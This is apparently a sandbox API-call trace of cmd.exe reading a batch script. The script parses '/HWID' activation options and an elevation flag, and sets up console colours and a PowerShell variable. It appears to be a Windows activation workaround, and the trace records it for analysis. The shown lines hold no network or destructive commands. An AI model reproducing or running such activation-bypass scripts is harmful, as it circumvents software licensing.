returned 0x1 [0181.240] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.240] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args set _args=%_args:\"=%\r\n", cbMultiByte=39, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined _args set _args=%_args:\"=%\r\n===================================================================================================\r\n") returned 39 [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] GetFileType (hFile=0x9c) returned 0x1 [0181.240] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.240] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if defined _args (\r\n", cbMultiByte=20, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if defined _args (\r\n _args=%_args:\"=%\r\n") returned 20 [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.240] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] GetFileType (hFile=0x9c) returned 0x1 [0181.241] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%A in (%_args%) do (\r\n", cbMultiByte=27, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for %%A in (%_args%) do (\r\n%_args:\"=%\r\n") returned 27 [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] GetFileType (hFile=0x9c) returned 0x1 [0181.241] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%A\"==\"/HWID\" set _act=1\r\n", cbMultiByte=50, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if /i \"%%A\"==\"/HWID\" set _act=1\r\n========================================================================================\r\n") returned 50 [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] GetFileType (hFile=0x9c) returned 0x1 [0181.241] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%A\"==\"/HWID-NoEditionChange\" set _NoEditionChange=1\r\n", cbMultiByte=62, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if /i \"%%A\"==\"/HWID-NoEditionChange\" set _NoEditionChange=1\r\n============================================================================\r\n") returned 62 [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] GetFileType (hFile=0x9c) returned 0x1 [0181.241] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if /i \"%%A\"==\"-el\" set _elev=1\r\n", cbMultiByte=51, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if /i \"%%A\"==\"-el\" set _elev=1\r\nnChange=1\r\n") returned 51 [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.241] GetFileType (hFile=0x9c) returned 0x1 [0181.241] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.241] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n/i \"%%A\"==\"-el\" set _elev=1\r\n") returned 3 [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] GetFileType (hFile=0x9c) returned 0x1 [0181.242] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.242] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\n") returned 3 [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] GetFileType (hFile=0x9c) returned 0x1 [0181.242] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.242] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] GetFileType (hFile=0x9c) returned 0x1 [0181.242] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.242] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for %%A in (%_act% %_NoEditionChange%) do (if \"%%A\"==\"1\" set _unattended=1)\r\n", cbMultiByte=77, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for %%A in (%_act% %_NoEditionChange%) do (if \"%%A\"==\"1\" set _unattended=1)\r\n=============================================================\r\n") returned 77 [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] GetFileType (hFile=0x9c) returned 0x1 [0181.242] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.242] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nr %%A in (%_act% %_NoEditionChange%) do (if \"%%A\"==\"1\" set _unattended=1)\r\n") returned 2 [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.242] GetFileType (hFile=0x9c) returned 0x1 [0181.242] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.243] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0181.243] _wcsicmp (_String1="_color2", _String2="") returned 95 [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] GetFileType (hFile=0x9c) returned 0x1 [0181.243] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.243] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] GetFileType (hFile=0x9c) returned 0x1 [0181.243] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.243] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul1=1>nul\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"nul1=1>nul\"\r\n========================================================================================================================\r\n") returned 18 [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] GetFileType (hFile=0x9c) returned 0x1 [0181.243] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.243] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul2=2>nul\"\r\n", cbMultiByte=18, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"nul2=2>nul\"\r\n") returned 18 [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.243] GetFileType (hFile=0x9c) returned 0x1 [0181.243] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.243] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul6=2^>nul\"\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"nul6=2^>nul\"\r\n=======================================================================================================================\r\n") returned 19 [0181.243] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] GetFileType (hFile=0x9c) returned 0x1 [0181.244] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.244] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"nul=>nul 2>&1\"\r\n", cbMultiByte=21, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"nul=>nul 2>&1\"\r\n=====================================================================================================================\r\n") returned 21 [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] GetFileType (hFile=0x9c) returned 0x1 [0181.244] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.244] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nt \"nul=>nul 2>&1\"\r\n") returned 2 [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] GetFileType (hFile=0x9c) returned 0x1 [0181.244] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.244] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set psc=powershell.exe\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set psc=powershell.exe\r\n==================================================================================================================\r\n") returned 24 [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] GetFileType (hFile=0x9c) returned 0x1 [0181.244] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.244] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set winbuild=1\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set winbuild=1\r\nll.exe\r\n") returned 16 [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.244] GetFileType (hFile=0x9c) returned 0x1 [0181.244] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.245] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /f \"tokens=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n", cbMultiByte=66, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for /f \"tokens=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n========================================================================\r\n") returned 66 [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] GetFileType (hFile=0x9c) returned 0x1 [0181.245] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.245] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nr /f \"tokens=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n") returned 2 [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] GetFileType (hFile=0x9c) returned 0x1 [0181.245] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.245] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _NCS=1\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set _NCS=1\r\nns=6 delims=[]. \" %%G in ('ver') do set winbuild=%%G\r\n") returned 12 [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] GetFileType (hFile=0x9c) returned 0x1 [0181.245] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.245] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% LSS 10586 set _NCS=0\r\n", cbMultiByte=36, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %winbuild% LSS 10586 set _NCS=0\r\n ('ver') do set winbuild=%%G\r\n") returned 36 [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] GetFileType (hFile=0x9c) returned 0x1 [0181.245] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.245] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %winbuild% GEQ 10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n", cbMultiByte=107, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %winbuild% GEQ 10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n===============================\r\n") returned 107 [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.245] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] GetFileType (hFile=0x9c) returned 0x1 [0181.246] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.246] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n %winbuild% GEQ 10586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n") returned 2 [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] GetFileType (hFile=0x9c) returned 0x1 [0181.246] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.246] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if %_NCS% EQU 1 (\r\n", cbMultiByte=19, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if %_NCS% EQU 1 (\r\n0586 reg query \"HKCU\\Console\" /v ForceV2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n") returned 19 [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] GetFileType (hFile=0x9c) returned 0x1 [0181.246] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.246] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="for /F %%a in ('echo prompt $E ^| cmd') do set \"esc=%%a\"\r\n", cbMultiByte=58, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="for /F %%a in ('echo prompt $E ^| cmd') do set \"esc=%%a\"\r\n2 %nul2% | find /i \"0x0\" %nul1% && (set _NCS=0)\r\n") returned 58 [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] GetFileType (hFile=0x9c) returned 0x1 [0181.246] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.246] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Red=\"41;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Red=\"41;97m\"\"\r\nmpt $E ^| cmd') do set \"esc=%%a\"\r\n") returned 24 [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.246] GetFileType (hFile=0x9c) returned 0x1 [0181.246] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.246] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Gray=\"100;97m\"\"\r\n", cbMultiByte=25, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Gray=\"100;97m\"\"\r\npt $E ^| cmd') do set \"esc=%%a\"\r\n") returned 25 [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] GetFileType (hFile=0x9c) returned 0x1 [0181.247] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.247] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Green=\"42;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Green=\"42;97m\"\"\r\n\n") returned 24 [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] GetFileType (hFile=0x9c) returned 0x1 [0181.247] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.247] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"Blue=\"44;97m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"Blue=\"44;97m\"\"\r\n") returned 24 [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] GetFileType (hFile=0x9c) returned 0x1 [0181.247] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.247] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_White=\"40;37m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_White=\"40;37m\"\"\r\n") returned 24 [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] GetFileType (hFile=0x9c) returned 0x1 [0181.247] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.247] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Green=\"40;92m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_Green=\"40;92m\"\"\r\n") returned 24 [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.247] GetFileType (hFile=0x9c) returned 0x1 [0181.248] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set \"_Yellow=\"40;93m\"\"\r\n", cbMultiByte=24, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="set \"_Yellow=\"40;93m\"\"\r\n") returned 24 [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] GetFileType (hFile=0x9c) returned 0x1 [0181.248] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.248] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=") else (\r\n", cbMultiByte=10, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=") else (\r\now=\"40;93m\"\"\r\n") returned 10 [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.248] GetFileType (hFile=0x9c) returned 0x1 [0181.248] ReadFile (in: hFile=0x9c, 